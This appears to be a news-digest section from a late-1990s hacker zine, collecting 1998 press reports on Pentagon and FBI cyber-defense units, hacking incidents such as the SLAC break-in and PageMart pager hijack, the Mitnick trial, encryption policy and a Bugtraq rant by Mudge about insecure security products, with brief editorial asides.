+The Joint Chiefs of Staff (JCS) is assessing several proposals for a
+Computer Defense Joint Task Force and JCS chairman Gen Henry Shelton is
+expected to make a recommendation to Defense Secretary William Cohen, who
+will have direct authority over the organisation, in the near future. 
+
+The JCS has a computer attack response cell within its directorate of
+operations, but it "has not been codified as a warfighting entity," said
+JCS spokesman Lt Cdr Jim Brooks. 
+
+The task force, which will conduct defensive rather than offensive
+information operations, will have the necessary authority to take action
+in the event of information attacks. Officials are determining how the
+unit should be structured, where it should be and how much it will cost. 
+
+They say that the new unit will have to have a high level of co-ordination
+with other federal agencies, particularly the Federal Bureau of
+Investigation, given the constitutional limitations placed on the US armed
+forces in the area of law enforcement. 
+
+JCS sources add that the task force is only expected to be an interim
+solution to the rising need for a specialised unit to counter incidents of
+cyber warfare. A permanent unit, possibly under the authority of one of
+the US warfighting commanders-in-chief, is planned for the future. 
+
+The Pentagon has seen a steep rise in computer attacks and other attempts
+either to access or contaminate DoD information networks. Art Money, the
+DoD's senior civilian overseeing computer operations, said on 10 June that
+the Pentagon experiences an average of 60 cyber attacks per week. 
+
+The US Department of Defense (DoD) plans to stand up its first operational
+unit of `cyber warriors' by September to safeguard against and respond to
+computer attacks aimed at the US military, according to defence officials. 
+
+The Joint Chiefs of Staff (JCS) is assessing several proposals for a
+Computer Defense Joint Task Force and JCS chairman Gen Henry Shelton is
+expected to make a recommendation to Defense Secretary William Cohen, who
+will have direct authority over the organisation, in the near future. 
+
+The JCS has a computer attack response cell within its directorate of
+operations, but it "has not been codified as a warfighting entity," said
+JCS spokesman Lt Cdr Jim Brooks. 
+
+The task force, which will conduct defensive rather than offensive
+information operations, will have the necessary authority to take action
+in the event of information attacks. Officials are determining how the
+unit should be structured, where it should be and how much it will cost. 
+
+They say that the new unit will have to have a high level of co-ordination
+with other federal agencies, particularly the Federal Bureau of
+Investigation, given the constitutional limitations placed on the US armed
+forces in the area of law enforcement. 
+
+JCS sources add that the task force is only expected to be an interim
+solution to the rising need for a specialised unit to counter incidents of
+cyber warfare. A permanent unit, possibly under the authority of one of
+the US warfighting commanders-in-chief, is planned for the future. 
+
+The Pentagon has seen a steep rise in computer attacks and other attempts
+either to access or contaminate DoD information networks. Art Money, the
+DoD's senior civilian overseeing computer operations, said on 10 June that
+the Pentagon experiences an average of 60 cyber attacks per week. 
+
+0x9>-------------------------------------------------------------------------
+
+Title: Tracking Global Cybercrime
+By: Claudia Graziano
+Date: 4:00 a.m.  25.Sep.98.PDT
+
+The International Chamber of Commerce said Thursday that it will open a
+new division to help companies around the world protect themselves against
+cybercrime.
+
+"Basically, any scams you can do terrestrially you can do even easier in
+cyberspace," said Eric Ellen, the chamber's executive director, who will
+take the reins of the new division.
+
+[Oooh.. 'terrestrially'.. three point word.]
+
+The London-based unit will work with Interpol to fight heavy-duty
+technological thievery -- such as money laundering, industrial espionage,
+and investment fraud -- as opposed to small-time consumer scams like
+selling nonexistent goods online.
+
+Interpol chief Ray Kendall said the international police agency had been
+pushing for years for such an alliance with the private sector since it
+could move more quickly than governments in purchasing the equipment
+needed to investigate high-tech crime.
+
+The cybercrime unit will provide the 7,000 International Chamber of
+Commerce members with information about how and where the myriad types of
+crimes are committed on the Net and what businesses can do to protect
+themselves against crackers and fraud artists.
+
+A Federal Trade Commission official praised the commission's efforts to
+raise domestic awareness of Internet fraud. 
+
+"We welcome any international effort to crack down on cyberfraud, because
+crime and fraud perpetrated against consumers or businesses only
+undermines the electronic marketplace and stifles the great opportunities
+available through Internet commerce," said Paul Luehr, an assistant
+director at the commission.
+
+The chamber said it hopes to persuade governments, including the United
+States, to wipe out restrictions that limit the spread and availability of
+strong encryption algorithms.
+
+That position flies in the face of US law enforcement, which currently
+limits the export of powerful crypto on the grounds that it might be used
+by terrorists.  Meanwhile, US crypto advocates have long said that ciphers
+are better suited to fighting crime than hiding it. 
+
+"There will be some lobbying on our part, but many businesses can't wait
+for laws,"  Ellen said. "Crimes cross international borders, yet existing
+laws [against cybercrime] are national."
+
+The chamber's cybercrime unit will meet regularly with Interpol in Lyon,
+France, to exchange information and intelligence on cybercrime and its
+perpetrators.
+
+Additionally, the chamber division plans to exchange information with the
+FBI's National Infrastructure Protection Center and the FBI's National
+Security Awareness unit, which looks after the interests of US businesses.
+
+Headquartered in Paris, the International Chamber of Commerce establishes
+rules that govern the conduct of businesses worldwide. The nonprofit group
+holds top-level consultative status with the United Nations, where it puts
+forward the views of business in countries around the world. 
+
+0xa>-------------------------------------------------------------------------
+
+Title: FBI Opens High-Tech Crisis Center 
+By: Michael J. Sniffen
+Date: Friday, November 20, 1998; 9:29 a.m. EST
+
+Entering its 91st year with new duties that extend around the world, the
+FBI today opened a high-tech, $20 million operations center nearly the
+size of a football field to allow headquarters to manage up to five crises
+at once.
+
+The new Strategic Information and Operations Center -- called ``sigh-ock''
+after its initials -- has 35 separate rooms that can seat up 450 people
+total and covers 40,000 square feet on the fifth floor of FBI headquarters
+on Pennsylvania Avenue. It is 10 times bigger than its two-decade-old
+predecessor that could, with difficulty, handle two crises simultaneously.
+
+Bureau officials became convinced the old SIOC was outmoded in the summer
+of 1996 when they tried to manage investigations of the Olympic bombing in
+Atlanta, the explosion of TWA 800 and the Khobar Towers truck-bombing in
+Saudi Arabia at the same time.
+
+``There weren't enough rooms or enough telephones,'' FBI Director Louis J. 
+Freeh said.  ``We had people working at desks in the hallway outside and
+reading top secret material in the vending area across the hall.''
+
+The supersecret facility with no windows to the street, or even any
+outside walls, has a private ribbon-cutting today with former President
+George Bush as the FBI celebrates its 90th birthday.
+
+Introducing the new SIOC to reporters for a one-time-only tour, Freeh said
+it was emblematic of the bureau's expanded responsibilities and
+technology.
+
+He noted that the bureau's fastest growing component, its Counterterrorism
+Center, is arrayed in the offices around the SIOC -- as is its violent
+crime unit, which handles domestic attacks such as the Oklahoma City
+bombing or hijackings.
+
+Much of the counterterrorism work now extends overseas, to Saudi Arabia
+where U.S.  soldiers have been killed in two bombings and East Africa
+where two U.S. embassies were bombed, for example. In the last five years,
+Freeh said, the FBI has nearly doubled its legal attaches working abroad
+-- to 32 cities now. Eight more are to open soon -- in Almaty, Kazakhstan; 
+Ankara, Turkey; Brasilia, Brazil; Copenhagen, Denmark; Prague, Czech
+Republic; Santo Domingo, Dominican Republic; Singapore and Seoul, Korea.
+
+The computers at desks throughout the center and the 5-by-15-foot video
+screens on the walls of almost every room can display not only U.S. 
+television broadcasts but also local TV channels from foreign countries. 
+The bank of red-lettered digital clocks in each room can display the local
+time in five or six locations.
+
+The FBI's new National Infrastructure Protection Center, tasked to prevent
+and respond to attacks on government or private computer systems that keep
+America running, will have three representatives on each of the 10-member
+watch teams that staff the center at all times. Also present around the
+clock: a representative of the National Security Agency's Cryptologic
+Security Group to provide information from the government's worldwide
+electronic eavesdropping. 
+
+Behind a series of blond wood doors, the complex warren of workrooms, many
+of which can be combined or divided as need requires, have light gray
+carpets, paler gray walls and dark gray metal desks with white plastic
+tops. The desks are fixed in place only in two control rooms that manage
+the flow of information to each room; elsewhere they are modular and can
+be rearranged at will over floor-mounted electric and telephone plugs.
+Interior windows allow views into conference rooms or the SIOC's hallways.
+
+Ron Wilcox, deputy chief of the SIOC, said the compartmented areas would
+allow bureau agents ``to work in one room with District of Columbia police
+on a local kidnapping while another room works on a terrorist bombing with
+top secret data.''
+
+Each work station can receive data from three sets of phone and computer
+links:  unclassified, secret and top secret-sensitive compartmented
+information.
+
+While the center will draw information from around the world, information
+will not leave without permission. The center is shielded to prevent
+outside detection of electronic emissions, so cell phones do not work
+inside it.
+
+In Operations Group D and G, the largest room with capacity for 118
+people, there are printers with yard-wide rolls of paper to print out city
+maps. So the room will not be overcome with noise, the sound from video
+screens is broadcast silently from black boxes around the room to
+headphone sets available to each worker. 
+
+The chairs, most on wheels, have arm rests. They are blue-green cloth in
+the workrooms;  gray leather in the Executive Briefing Room, the center's
+second largest room, with three blond wood semicircles seating 36 and
+fixed theater seats at the back for 50 more.
+
+Rather than increasing the burden on field agents to report to Washington,
+Wilcox said the new center should reduce such demands, because ``we will
+offer one-stop shopping for headquarters. Field agents can report to us,
+and we will be responsible for making sure everybody is alerted who should
+be.''
+
+0xb>-------------------------------------------------------------------------
+
+Title: Navy fights new hack method
+By: Tim Clark
+Source: CNET NEWS.COM
+
+Hackers are banding together across the globe to mount low-visibility
+attacks in an effort to sneak under the radar of security specialists and
+intrusion detection software, a U.S. Navy network security team said
+today. 
+
+Coordinated attacks from up to 15 different locations on several
+continents have been detected, and Navy experts believe that the attackers
+garner information by probing Navy Web sites and then share it among
+themselves. 
+
+"These new patterns are really hard to decipher--you need expert forensics
+to get the smoking gun," said Stephen Northcutt, head of the Shadow
+intrusion detection team at the Naval Surface Warfare Center. "To know
+what's really happening will require law enforcement to get hold of the
+hackers' code so we can disassemble it." 
+
+The new method involves sending as few as two suspicious probes per hour
+to a host computer, a level of interest that usually won't be detected by
+standard countermeasures.  But by pooling information learned from those
+probes, hackers can garner considerable knowledge about a site.
+
+0xc>-------------------------------------------------------------------------
+
+Title: Pentagon Blocks DoS Attack
+Source: Newsbytes via NewsEdge
+
+The Pentagon launched an attack applet of its own this month to thwart a
+denial-of-service attack against its DefenseLink Web site at
+http://www.defenselink.mil . 
+
+DefenseLink was one of three sites targeted on Sept. 7 by a group that
+calls itself the Electronic Disturbance Theater. The group claimed to be
+acting in solidarity with Zapatista rebels in the Mexican state of Chiapas
+to protest Defense Department funding of the School of the Americas. 
+
+Other target Web sites belonged to Germany's Frankfurt Stock Exchange and
+Mexican President Ernesto Zedillo. 
+
+The theater group's Web site referred to the attacks as a virtual sit- in. 
+Visitors to the group's site received a hostile Java applet designed to
+keep reloading the DefenseLink and other Web sites automatically as long
+as the the visitors' browsers were open. 
+
+Multiple simultaneous reload requests can overwhelm a server, but the
+attacks apparently had little impact, DOD officials said. 
+
+"Our support staff certainly was aware of the planned attack," Pentagon
+spokeswoman Susan Hansen said. "They took preventive measures to thwart
+the attack so that DefenseLink was available." 
+
+Hansen would not specify the preventive measures, but the theater group
+reported, and a DOD official confirmed, that the Pentagon aimed its own
+hostile applet back at the attackers. 
+
+Browsers "got back a message saying the (theater group's) server wasn't
+available," Hansen said. 
+
+The Frankfurt exchange reported the reload requests had little or no
+impact on its server, either. 
+
+The theater group has promised a second round of attacks, known as
+FloodNet, between Sept. 16, Mexican Independence Day, and Oct. 12,
+Columbus Day. 
+
+Representatives of security software vendor Finjan Inc. of Santa Clara,
+Calif., said the attacks marked the first time Java applets have been used
+in a political protest, although the theater group has claimed
+participation in other virtual sit-ins against Zedillo and President
+Clinton since April. 
+
+The group is a throwback to the 1960s guerrilla theater of the Yippies,
+who once hosted an attempt to mentally levitate the Pentagon. The theater
+group's Web site at http://www.nyu.edu/projects/wray/ecd.html advocates
+electronic civil disobedience. Its attempted Pentagon attack was part of
+Swarm, a project launched at the Ars Electronic Festival on InfoWar in
+Linz, Austria. 
+
+The group's announced activities, in addition to the unspecified attacks
+planned through mid-October, include radio protests against the Federal
+Communications Commission on Oct. 4 and 5. 
+
+The Swarm attacks reportedly did not meet with much approval among
+hackers, who view FloodNet as an abuse of network resources. 
+
+0xd>-------------------------------------------------------------------------
+
+Title: Hackers Elude Accelerator Center Staff
+Source: San Francisco Chronicle
+Date: 06/11/98
+
+Officials at Stanford Linear Accelerator Center are rethinking the
+openness of their computer system a week after hackers forced them to shut
+down outside access to the federal research facility's computer network.
+
+External access to the center's computer system was suspended after staff
+members failed to catch hackers who had intercepted a password and were
+moving in and out of more than 30 of the facility's Unix servers.
+
+"We traced the hackers around to the point that we weren't gaining on
+them," said center spokeswoman P.A. Moore. "The person or persons were
+successful in covering their tracks and in getting into and out of
+accounts." 
+
+It is still unclear how the hackers got access to a password and the
+system, Moore said. 
+
+But as a result of the breach, she said, officials are rethinking the
+center's policy of being an open scientific research facility.  She said
+proposals are being considered to restrict the center's computer system.
+
+"A number of options are being considered and they range from very mild to
+more severe," she said.
+
+Moore said that most of the center's Internet services were restored
+Tuesday after security measures were put in place and that staff members
+were instructed to change their passwords.
+
+The shutdown did not create any serious problems, although it caused
+delays in many projects and denied researchers from all over the world
+access to the center's Web site, Moore said.
+
+Established in 1962, the Linear Accelerator Center is funded by the
+Department of Energy and operated by Stanford University. With a staff of
+about 1,300 and 2,000 researchers worldwide, the center conducts basic
+research on atomic and subatomic physics. The center's researchers use
+colliders to study matter at the atomic level.  "Mostly, we've lost time
+on experiments," Moore said. "We do not see that any data has been
+compromised. It's more of a setback than a major disaster."
+
+But she said future break-ins will remain a problem for open scientific
+facility. The center does not conduct any classified research, she said.
+
+"Computer hackers are very sophisticated in terms of their knowledge and
+ease in traveling through cyberspace," she said. "We're vulnerable. By
+being an open facility, we are a target for vandals." Stephen Hansen, a
+Stanford University computer security officer, said campus system
+break-ins average at least two a month.
+
+A common tool used by hackers is a computer program dubbed "the sniffer," 
+which allows intruders to decode data in a system, specifically passwords
+and log-on names.
+
+"Sniffers are quite dangerous," Hansen said. "If they are not caught right
+away, they can lead to break-ins to thousands of accounts, not just
+locally, but across the Internet."
+
+To minimize such break-ins, he said, more system operators are using
+encryption programs that prevent hackers from determining sign-on names
+and passwords. However, this is not an easy option for the Stanford center
+because encryption programs are prohibited in some countries, including
+France, where a number of center-affiliated researchers live. 
+
+0xe>-------------------------------------------------------------------------
+
+Title: Cyberattacks leave feds chasing 'vapor'
+By: Bob Brewin (antenna@fcw.com)
+
+Top administration officials last week warned that the United States lacks
+the capability to quickly identify the nature and scope of a continuing
+series of cyberattacks against both federal and private systems that
+support the country's telecommunications, financial and energy critical
+infrastructures.
+
+During a series of congressional hearings and in speeches last week,
+federal security and information technology officials made it clear that
+they anticipate a powerful ''Achilles' heel'' cyberattack that could
+cripple the nation's vital systems because the government lacks the
+ability to defend against such an attack.
+
+John Hamre, deputy secretary of Defense, told the House National Security
+Committee that such a paralyzing cyberattack against critical
+infrastructures is inevitable. "There will be an electronic attack
+sometime in our future," he said. "Should an attack come, it will likely
+not be aimed at just military targets but at civilian [targets] as well." 
+Administration officials also reported that the attacks continue unabated.
+
+Art Money, who is slated to take over as assistant secretary of Defense
+for command, control, communications and intelligence later this year,
+said in a speech at a conference in Washington, D.C., last week that DOD
+"averages 60 intrusions a week" into its computer systems.  An official of
+the FBI's new National Infrastructure Protection Center (NIPC) said the
+office is investigating a "half dozen" incidents, describing them as
+''substantial.''
+
+But security agencies said the process of chasing down and identifying
+attackers is frustrating, as in the case of the highly publicized series
+of hacks against DOD computers last February. The FBI and numerous DOD
+agencies worked together to track down the hackers, but the agencies could
+not "identify [until] the following week"  the source and type of attack,
+Ellie Padgett, deputy chief of the National Security Agency, told the
+Senate Judiciary Committee's Subcommittee on Technology, Terrorism and
+Government Information.
+
+Padgett said it would still take the agency a "matter of days" to
+determine if an attack was strategic or just a teenage prank.
+
+Michael Vatis, director of NIPC, told the committee, "In most
+cyberattacks, it's impossible to know the identity of the penetrator," be
+it teenage hackers, criminals or a strategic attack by a hostile nation. 
+Vatis, in an interview, likened chasing down hackers to "tracking vapor."
+
+Barry Collin, a senior researcher with the Institute for Security and
+Intelligence, said it will become increasingly difficult to identify
+strategic attacks because a nation that is sophisticated enough to mount a
+cyberwar against the United States also will have the sophistication to
+disguise that effort as a hacker attack mounted by teenagers. "They can
+make it appear as if it is a game instead of a real attack," he said.
+
+A "Predatory Phase" 
+
+Also frustrating security experts is the possibility that attacks will be
+carried out in quick hits over a long period of time, Hamre said. "The
+predatory phase could take place over several years, making it hard to
+collate curious, seemingly unrelated events into a coherent picture," he
+said. These long-term attacks "could take place over multiple
+jurisdictions - [for example] power grids or air traffic control nodes in
+various states. Our knowledge of the origin of such attacks and their
+sponsorship is likely to be imprecise." 
+
+Hamre also presented classified testimony to a joint closed hearing of the
+House National Security Committee's Military Procurement and the Military
+Research and Development subcommittees. Hamre may have presented more
+detailed evidence of computer vulnerabilities, based on remarks by Rep. 
+Curt Weldon (R.-Pa.), chairman of the Military Research and Development
+Subcommittee, who called Hamre's classified testimony "the most
+provocative briefing" he had ever received during his 12 years in
+Congress.
+
+The Clinton administration hopes to protect the critical infrastructures
+with recently formed security organizations, including the National
+Infrastructure Assurance Plan, the NSA Network Incident Analysis Cell and
+the Critical Infrastructure Assurance Office in the Commerce Department. 
+CIAO will spearhead multiple-agency efforts to develop better policies,
+processes, procedures and systems to detect and deter attacks.
+
+The administration also plans to heavily involve the private sector -
+banks, power companies and railroad companies - in "public/private
+partnerships'' to protect the infrastructure. 
+
+Members of Congress on both sides of the Hill praised the administration's
+initial efforts, but they also expressed some skepticism about the
+approach. Sen. Diane Feinstein (D-Calif.) said she "wondered if the nexus
+between the public and private sectors will work." 
+
+Rep. Herbert Bateman (R-Va.) said he is "deeply skeptical"  about placing
+the CIAO in Commerce rather than in DOD.
+
+Bateman said Commerce's willingness to allow the exportation of critical
+satellite and rocketry information to the Chinese left him "unconvinced" 
+that Commerce had the same "sensitivity" as the Pentagon has to the
+requirements of national security.
+
+0xf>-------------------------------------------------------------------------
+
+Title: Congress Attacks Cyber Defense Funds
+Source: Defense News
+Date: 6/16/98
+
+U.S. Congress Attacks Cyber Defense Funds By George I. Seffers Defense
+News Staff Writer WASHINGTON-- Congress is taking millions of dollars from
+the war chest intended to protect critical U.S. infrastructure from
+potentially crippling cyber attacks, according to Defense Department and
+White House sources. The House Appropriations Committee deleted the entire
+$69.9 million the Defense Department had requested for infrastructure
+protection in its 1999 budget. That funding should be restored, Linton
+Wells, principal deputy for the assistant secretary of defense for
+command, control, communications and intelligence, told lawmakers at a
+June 11 hearing here on protecting national infrastructures--
+telecommunications, banking and finance, energy, transportation, and
+essential government services-- from cyber attack. 
+
+[So they make all these new groups to fight cybercrime.. then
+ this?]
+
+0x10>------------------------------------------------------------------------
+
+Title: Mudge on Security Vendors
+From: Bugtraq
+
+In the SAFER bulletin they mention compromising software that was
+explicitly installed as an additional security measure.
+
+While joking around I was mentioning to some colleagues about the
+attrocity of some (most) of the security related products out there right
+now. Not in what they are claiming to accomplish but in the lack of sound
+coding in their own products. I thought it was pretty much understood but
+the amazed looks on their faces told me otherwise. So I figured I might
+point this out in case that was not an isolated assumption that these
+people had. Hopefuly I'm already preaching to the choir on Bugtraq.
+
+[Note - though I explicitly mention ISS and Axent they are by no means any
+worse or better than others not mentioned here... in addition I am
+referring to older versions of their products. I have not spent time
+looking at their most current releases to verify whether things have
+improved or gotten worse. Please take this for what it is meant to be - a
+general rant about the security vendor world as it stands... not an attack
+against particular vendors]
+
+A few real world cases: 
+
+A few revs back in ISS' commercial security scanner there were several
+vulnerabilities. One particular company contracted me to come in and give
+them a report on the level of competance that an auditing company they had
+hired were at.
+
+Sure enough, when the auditor scanned the box that we had setup they were
+using ISS (version 3? my memory isn't serving me very well right now).
+Upon an attempt to connect to tcp/79 (fingerd) we fed them back a bunch of
+'garbage' (well, you know... that garbage that is comprised of a long run
+of NOPs followed by machine dependent opcodes and operands :). After a few
+tries, root on the scanning machine was handed out as there were no checks
+done on the data that was being retrieved (or more accurately assumptions
+were being made about the length).
+
+...
+
+Axent swore up and down that their ESM systems were communicating via DES
+encrypted channels. In reality the communications were simply XOR'd and
+they would send the progressive XOR key every X packets. The DES
+components were slated for the 'next rev'. Doesn't matter - the point is
+that they shouldn't have done the XOR scheme to begin with when the
+purpose of the communications between the client and server are "lists" of
+vulnerabilities on said machines. Not something you want advertised to
+anyone passivle monitoring.
+
+...
+
+I don't know how many "security" packages I've looked at that do
+outrageously stupid things like chmod(777), popen(), or system() even! 
+Even if the program is running non-priveledged and is designed to be on a
+system that does not have multiple users it is a demonstration that the
+people writing the code to protect your systems (often at outrageous price
+tags!) seem incapable of demonstrating sane coding techniques themselves.
+
+How is one supposed to get 'warm fuzzies' that one is having their systems
+"protected" when the products doing the protecting show no security
+competence. 
+
+Vendors listen up!
+
+.mudge
+
+0x11>------------------------------------------------------------------------
+
+Title: More delays for Mitnick trial
+By: Kevin Poulsen
+Date: November 25, 1998 3:33 PM PT
+Source: ZDNet
+
+Accusing government attorneys of stalling efforts to collect key documents
+for his case, the defense attorney representing Kevin Mitnick, famed
+criminal hacker, requested a continuance on Tuesday. According to Donald
+Randolph's motion, the government missed a court-ordered deadline to
+provide the defense with copies of prosecution witnesses statements.  The
+statements were finally handed over on Tuesday, almost a month late. 
+
+In addition, the prosecution is almost a week behind in handing over a
+list of evidence to the defense. Some electronic evidence is being
+withheld completely, claimed Randolph.
+
+Prosecution delays
+
+"Due to the government's significant delay in producing discovery as
+ordered by this court, and due to its continuing failure to produce
+certain discoverable evidence altogether, the defense cannot competently
+complete its investigations and prepare for trial in this matter absent a
+reasonable continuance in the trial date," stated the motion. 
+
+The original trial was scheduled for Jan. 19, 1999. 
+
+The prosecutors attacked any delay. "The contention that we have been late
+with materials is disingenuous," says prosecutor David Schindler.  "We've
+provided thousands of pages of discovery."
+
+Government mole? 
+
+The text of the motion also implied that the government had paid a
+one-time Mitnick cohort and employee of Mitnick's previous attorney, Ron
+Austin, to spy on his client.
+
+"Austin was privy to confidential communications between Mr. Mitnick and
+Mr. Sherman which he later disclosed to the government," said the
+statement.
+
+0x12>------------------------------------------------------------------------
+
+Title: 'Back door' doesn't get very far 
+Source: San Jose Mercury News
+
+A U.S. government panel has failed in a two-year effort to design a
+federal computer security system that includes ''back doors,'' a feature
+that would enable snooping by law enforcement agencies, people familiar
+with the effort said this week. The failure casts further doubt on the
+Clinton administration policy -- required for government agencies and
+strongly encouraged for the private sector -- of including such back doors
+in computer encryption technology used to protect computer data and
+communications, according to outside experts. 
+
+But administration officials said the panel, which is set to expire in
+July, simply needed more time. The 22-member panel appointed by the
+secretary of commerce in 1996 concluded at a meeting last week that it
+could not overcome the technical hurdles involved in creating a
+large-scale infrastructure that would meet the needs of law enforcers,
+panel members said. The group was tapped to write a formal government plan
+known as a ''Federal Information Processing Standard,'' or FIPS, detailing
+how government agencies should build systems including back doors.
+
+0x13>------------------------------------------------------------------------
+
+Title: ICSA Goon Pretends to be a Hacker        [my title]
+Source: Forbes Digital Tool
+By: Adam Penenberg
+
+J3 spends his days trolling around the hacker underground, monitoring
+hacker channels on Internet Relay Chat, checking out the latest on
+"phreaking,"--cracking the phone system-- dialing up bulletin boards and
+checking out web sites that offer password-cracking software and how-to
+guides. 
+ 
+For J3 this isn't just a hobby, it's a job. 
+ 
+ICSA, a computer security firm, hired J3 (not his real name nor his online
+"nick", since his success depends on total anonymity) two years ago as the
+company's lead underground analyst. His mission: to keep tabs on the
+latest trends and tools in the hacker world. When he gets wind of a new
+security hole, he passes the information on to ICSA's tech staff so that
+the company can either develop a defense or tip off software makers before
+the flaw can be exploited. 
+
+J3 is very busy. Recently, a group of European hackers released a Trojan
+horse-like program that would enable them to set up backdoors in geeky
+programs known only to network administrators, such as "named" programs
+related to domain name servers, a basic component of any network connected
+to the larger Internet. J3 found out about it in the course of his
+monitoring, passed it on to ICSA, and the company informed CERT (Computer
+Emergency Response Team) which posted an advisory. 
+
+The Internet is a lot like Lord of the Flies, a nasty, violent --yet
+virtual--world where the strong intimidate the weak. 
+
+He was also instrumental in helping ICSA detect two types of denial of
+service attack modes--Teardrop and Land--that were being used to exploit
+vulnerabilities in the TCP/IP protocol. These new attacks took advantage
+of tweaks that would beat existing patches, which made it difficult for
+system administrators to stay ahead of hackers. But J3, because of his
+links to the underground, was able to learn of these exploits shortly
+after they were posted on hacker channels. 
+
+"I'm proud of a lot of the work we do," J3 says. "I've found a company's
+entire password file posted to a web site, or that hackers have root in a
+network or that a merchant site with a database of credit cards has been
+compromised. I then contact the companies and warn them." 
+
+He says that the Internet is a lot like Lord of the Flies, a nasty,
+violent--yet virtual--world where the strong intimidate the weak. Not all
+hackers are destructive, of course. There are many good ones on a quest
+for pure information, the lifeblood of their avocation, who post security
+flaws because they believe it's the best way to fix them.  It's the ones
+who exploit these flaws to cause damage that irritate J3. 
+
+But they have a vulnerability: their need for self-aggrandizement, which
+is key to J3's success. "If hackers didn't brag," he says, "I wouldn't
+have a job." 
+ 
+J3, who works mostly nights since the Internet never sleeps, isn't just a
+full-time worker. He's also a graduate student working on his Ph.D. in
+psychology. And his area of study? 
+ 
+Hackers, of course. 
+
+0x14>------------------------------------------------------------------------
+
+Title: Is Your kid a Hacker
+Source: Family PC Magazine
+Date: November 1998
+By: Kevin Poulsen
+
+If you suspect your kid is a computer hacker, here's some advice from a
+convicted hacker on how to handle it
+
+It starts with a knock on the door.  A dozen men in suits and shoulder
+holsters are outside, their Buicks and Broncos crammed into your driveway
+and parked along the street.  Over their shoulders you can see your
+bathrobe-clad neighbors watching the spectacle from their lawns.  It might
+be the FBI, it may be the Secret Service, but whoever it is, the humorless
+agents hand you a piece of paper and head toward your son or daughter's
+room.  You wonder, perhaps for the first time, what your kid has been
+doing in there with the computer.
+
+If you're a parent, you probably regard the Internet as a font of both
+promise and peril for your children.  It can be an invaluable learning
+tool and a way to encourage your kids to develop the basic computer skills
+they'll eventually need.  But what if they take to it a little too eagerly
+and enthusiastically and begin using it to get into places where they
+don't belong?  In that case, normal youthful rebellion, or simple
+inquisitiveness, if it's expressed over the Internet, could turn your
+family upside down. 
+
+It happened last February in Cloverdale, California, when surprised
+parents found out their teenage son was suspected in a series of Pentagon
+intrusions.  It happened again in Massachusetts a week later, when the
+Justice Department won its first juvenile conviction under the Federal
+Computer Fraud and Abuse Act.
+
+It happened to my family 15 years ago, in one of the first hacker raids in
+the country.  At that time, I was the teenage miscreant who was illegally
+accessing federal computers.  Now, in my early thirties, I've begun to
+wonder how I would protect a kid of my own from becoming a poster child
+for computer crime.  I believe the best approach is to stay informed and
+to communicate with your potential cyberpunks.
+
+Open Communication Channels
+
+Some of the things you might view as ominous warning signs are actually
+quite harmless.  For example, if your teenager calls himself a "hacker," 
+he may not be headed for trouble.  Despite the media's breathless
+exhortation, hackers are not lawbreakers by definition.  The word actually
+describes someone with a talent for technology, a deep interest in how
+things work, and a tendency to reject any limitations.  If your son
+disassembled the Giga Pet you gave him for Christmas, he's probably a
+hacker.  If he made it run better, he definitely is.  Of course, some
+hackers go further and test their skills against the adult world of
+corporate and governmental computer systems.
+
+If I thought my kids were cracking computers, I would want to put a stop
+to it -- though not because it's the crime of the century. True hackers
+live by an ethical code that precludes damaging systems or profiting from
+their intrusions.  There are worse values for a teenager to have.  But
+regardless of motives, a hacker who's caught in the act today is likely to
+be treated as an industrial spy or a national security threat.  A single
+moment of rebellious exploration could land a teenager an early felony
+conviction.
+
+If you suspect that your kid may be crossing the line, there are various
+software packages on the market that will allow you to monitor or control
+his or her access to the Internet.  Don't even think about using one.  If
+your teen really is a hacker, your technological solution will be a source
+of amusement and derision, as well as an insult to his talents. Instead of
+putting up barriers, I suggest you talk to your kids.
+
+If your kid is reading underground Web sites for hackers, read them
+yourself.  If he has a subscription to a hacker magazine, go through it
+and ask questions.  Feel free to marvel at the cleverness of the latest
+hacker technique.  Then talk about consequences: the rising costs of legal
+representation, the problems that a convicted felon encounters in academia
+and the job market.  Start looking at alternatives to a life of
+cybercrime. 
+
+Constructive Alternatives
+
+If your kid has a rebellious streak, I suggest giving up on trying to
+suppress it; try to channel it instead.  When hackers grow up, they often
+find a reasonable substitute for the thrill of intrusion by working the
+other side.  Ask your teen how he would plug the latest security holes. 
+Get him thinking about it.  Ask him for advice on protecting your own
+e-mail or your ISP account. 
+
+The hacker tradition has always contained an element of disrespect for
+authority. Up until 15 years ago, cracking systems was an acceptable rite
+of passage in the industry, and some of the same people who pioneered
+artificial intelligence and the personal computer also ushered in phone
+phreaking, lock hacking, and computer intrusion. Early hackers believed
+that computers were a public resource and that access to them and
+knowledge about them should be free.
+
+In a sense, the first-generation hackers won their battle when they
+created the personal computer: It gave them free access to computing power
+anytime they wanted.  Today, kids can claim that victory on the Internet
+by authoring a Web page.  There is plenty of room for innovation and
+creativity.
+
+Today's PCs are as powerful as yesterday's mainframes.  With today's PCs,
+no one needs to break the law to explore technology. With the right tools,
+and parental support, kids can earn the respect of their peers and get an
+early start on their future by mastering the latest programming languages. 
+If my kid were a hacker, I'd encourage him to shun the instant
+gratification of cracking a Fortune 500 company in favor of the greater
+satisfaction of creating something unique from scratch.
+
+Ultimately, that's what hacking really is all about. 
+
+0x15>------------------------------------------------------------------------
+
+Title: Paging Network Hijacked              
+By: Chris Oakes
+Date: 4:00am  24.Jul.98.PDT
+
+[A non internet hacking article! Woohoo!]
+
+Someone in Texas exploited a vulnerability in the PageMart paging network
+this week, sending a flurry of mysterious pages to tiny screens
+nationwide, confusing subscribers, and swamping the company's customer
+service center with phone calls.
+
+PageMart said a random discovery enabled the intruder to use a set of
+pager addressing numbers to send messages to entire groups of customers,
+rather than individual subscribers. But a security expert said the system
+may have been hacked.
+                                     
+PageMart spokeswoman Bridget Cavanaugh detailed Wednesday's incident in an
+email late Thursday.  "A person, unknown to PageMart," she said,
+"discovered that three PINs [personal identification numbers] on our
+paging terminal in Dallas were actually mail drops." 
+
+[snip...]
+
+On Wednesday, PageMart customer and San Francisco resident Jeremiah Kelly
+reported that he received odd messages for a period of about an hour and a
+half on Wednesday afternoon.
+
+Upon receiving one incomprehensible page -- unrecognizable in source or
+content -- he suspected a simple "wrong-number" message. "But then, all of
+a sudden, I got a blitz"  Kelly said. Most notable was a recurring
+message: "There is only one blu bula."
+
+"I received one of those several times," he said. Another pair of messages
+said "Mike, you're Mom drives a Passat," and another was sexually
+suggestive. Both of the latter pages were signed "Christian." Kelly said
+he received about 30 of the senseless messages.
+
+[snip...]
+
+"The incident impacted about 1.5 percent of our customers nationwide," 
+Cavanaugh said.  "Statistically, it's a small number." PageMart provides
+numeric and text paging service in all 50 states, Canada, Mexico, Central
+America, and the Caribbean, serving approximately 2.7 million customers.
+
